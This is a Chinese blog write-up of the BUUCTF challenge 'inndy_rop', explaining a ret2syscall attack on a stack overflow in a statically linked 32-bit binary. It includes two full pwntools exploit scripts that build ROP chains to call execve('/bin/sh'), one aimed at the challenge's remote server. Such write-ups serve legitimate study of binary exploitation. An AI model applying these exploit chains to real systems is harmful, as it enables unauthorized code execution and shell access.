ret2syscall

原创 已于 2024-09-10 17:05:10 修改 · 372 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

于 2024-09-10 14:07:52 首次发布

[buu] inndy_rop

检查保护,文件只开启了NX。接着丢进ida里

找到目标函数,gets函数存在明显的栈溢出,并且可以看到该程序是静态链接的程序,这也就意味着我们可以找到足够使用的gaget去构造rop链从而控制程序执行流。

动调确定溢出长度位offset=16

寻找目标gagets

0x080b8016 : pop eax ; ret
0x080481c9 : pop ebx ; ret
0x080de769 : pop ecx ; ret
0x0806ecda : pop edx ; ret

对应exp:

from pwn import*
i=process("./rop")
context.log_level="debug"
 
pop_eax=0x080b8016
pop_ebx=0x080481c9
pop_ecx=0x080de769
pop_edx=0x0806ecda
int80=0x0806f430#用radare2,ropgadget搜索不到int 0x80;ret
bss=0x080EB5BD
p1=cyclic(0xc+4)
p1+=flat([pop_eax,0x3,pop_ebx,0,pop_ecx,bss,pop_edx,0x10,int80])
p1+=flat([pop_eax,0xb,pop_ebx,bss,pop_ecx,0,pop_edx,0,int80])
 
 
i.sendline(p1)
i.sendline(b"/bin/sh\x00")
 
i.interactive()

也可利用ropchain

exp:

from pwn import*
from struct import*     #pack
#io=process('./rop')
io=remote('node4.buuoj.cn',29207)
p=b'a'*(0xc+4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
io.sendline(p)
io.interactive()

igiohhh
关注
PWN基础-ROP技术-ret2syscall-64位程序栈溢出利用
Welcome To My6n Blog
05-08 779
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 位系统调用最后是执行 syscall。32 位系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
ARM Linux系统调用详细分析
liduxun的专栏
08-31 9345
文件: linux-2.6.30.4/arch/arm/kernel/entry-common.S linux-2.6.30.4/arch/arm/kernel/calls.S 在entry-common.S中包含了上次calls.S,这里简单分析前两次: 第一次: 在entry-common.S中: .equ NR_syscalls,0 #define CALL(x) .equ
linux系统调用
nanfenglei23的专栏
12-14 1877
从原理到具体实现详细解释linux系统调用
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1710
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
Android Hook框架adbi的分析(3)---编译和inline Hook实践
Fly20141201. 的专栏
07-16 3718
本文博客地址:http://blog.youkuaiyun.com/qq1084283172/article/details/75200800一、序言在前面的博客中,已经分析过了Android Hook框架adbi源码的具体实现,Android Hook框架adbi的实现主要分为两部分,一部分是root权限下的Android跨进程的so注入,一部分是基于Android系统的inline Hook。
【PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3932
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ret2syscall简单总结
ULGANOY的博客
07-05 1738
主要是自己的简单的学习总结。
ret2syscall 入门
akdelt的博客
01-24 651
系统调用是操作习系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作,网络通信,进程管理等。x86 通过 int 0x80 指令进行系统调用,amd64 通过 syscall 指令进行系统调用比如 write 函数32位汇编代码系统调用号,触发 nr_writemov ebx,1mov edx,13int 0x80;中断触发系统调用‘’
RET2syscall
T_Fire_of_Square的博客
12-18 488
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
ret2syscall 原理与实践
m0_57836225的博客
12-12 1001
在 CTF(夺旗赛)的 PWN(二进制漏洞利用)挑战中,ret2syscall 是一种经典且重要的利用技巧,用于获取目标系统的控制权。掌握 ret2syscall 对于深入理解二进制漏洞利用和提升 PWN 解题能力具有关键意义。在操作系统中,系统调用是用户程序与操作系统内核之间的接口。用户程序通过执行特定的指令(如在 x86 架构下的 int 0x80 或 syscall 指令),并传递相应的参数,来请求内核执行特定的功能,如文件操作、进程管理等。
从零开始学逆向:理解ret2syscall
weixin_44626085的博客
02-19 1493
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 1122
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
Nmap 完整教学与 Linux 指令详解
2401_84359179的博客
01-03 1648
总结:Nmap 是网络安全领域的"瑞士军刀",掌握 `-sS`、`-sV`、`-O`、`-A`、`-p`、`-T`、 `--script` 这 7 大核心参数,即可应对 90% 的扫描场景。1.权限 :SYN 扫描 (`-sS`)、OS 检测 (`-O`)、UDP 扫描 (`-sU`) 需要 root 权限。3. 防火墙:现代 IDS/IPS 能检测 Nmap 扫描特征,需配合 `-T2`、`-f`、`-D` 等规避。初学者 :从 `-sT`、`-sV`、`-p` 开始,逐步学习高级选项。
Linux-Web服务(Apache)
Maggie_ssss_supp的博客
01-05 573
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开源的web服务器,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。1.主配置目录:/etc/httpd/conf/2.子配置目录:/etc/httpd/conf.d/2.默认发布目录:/var/www/html/3.默认监听端口:804.检查是否有语法问题:httpd -t。
linuxshell循环,条件分支语句
weixin_74911003的博客
01-07 133
本文介绍了Shell脚本中循环结构和多分支结构的编程方法。主要内容包括: for循环的三种使用方式: 列表遍历(遍历字符串列表) 序列范围遍历(正序/倒序数字序列) C语言风格(带初始条件、循环条件和更新表达式) while循环的基本语法和使用示例,强调循环变量初始化和更新的重要性。 多分支if判断结构,包括if-elif-else的语法格式。 常见案例实现: 遍历城市列表和数字序列 计算特定条件的数字累加和(如偶数求和) 处理目录下的文本文件(查找、备份等) 函数定义与调用方法,包括参数接收和结果输出。
Linux 上几种 exFAT 驱动的区别
最新发布
qq_42161913的博客
01-07 234
Linux 上几种 exFAT 驱动的区别
Linux磁盘占用分析指南
哈喽。
01-06 381
Linux磁盘占用分析指南摘要 本文全面介绍了Linux系统中分析磁盘占用的多种方法。基础命令包括du(显示目录大小)和df(显示文件系统使用情况),配合-h参数可人性化显示。高级工具推荐ncdu(交互式分析)和gt5(历史对比)。文章提供了实用脚本:查找大文件、目录分析报告和磁盘监控脚本,并介绍了可视化工具filelight和baobab。最佳实践建议定期清理、监控使用率、压缩归档大文件。常见问题解决方案包括处理已删除但未释放的文件和权限问题。通过合理组合这些工具,可高效管理Linux磁盘空间。
ret2syscall 64位
11-12
ret2syscall是一种ROP(Return Oriented Programming)技术,用于在64位程序栈溢出利用中执行系统调用。其核心思路是通过构造栈上的数据,控制程序的执行流程,将寄存器设置为系统调用所需的参数,然后触发系统调用...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值